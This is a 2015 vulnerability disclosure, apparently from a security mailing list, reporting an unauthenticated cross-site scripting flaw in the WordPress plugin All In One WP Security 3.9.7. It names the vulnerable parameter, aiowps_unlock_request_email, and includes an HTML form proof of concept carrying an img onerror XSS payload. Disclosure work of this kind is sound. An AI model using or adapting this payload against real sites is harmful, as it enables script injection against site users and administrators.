Subject: Cross-Site Scripting (XSS) in All In One WP Security 3.9.7

Date: Thu, 13 Aug 2015 14:52:24 +0200

Hello,

Plugin: All In One WP Security 3.9.7 https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/

1. Cross-Site Scripting (XSS)

Unauthenticated attackers can inject arbitrary html/js code (default installation).

Method: POST

Url: http://localhost/wp-admin/admin.php?page=aiowpsec

Vulnerable parameter: aiowps_unlock_request_email

Example PHP callstack:

/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php:56

display_unlock_form [/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php:101]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin.php?page=aiowpsec">

<input type="text" name="aiowps_wp_submit_unlock_request" value="1" />

<input type="text" name="aiowps_unlock_request_email" value='"><img src=x onerror=alert(1) />' />

<input type="submit" />

</form>

--

--

Regards,
Marcin Probola,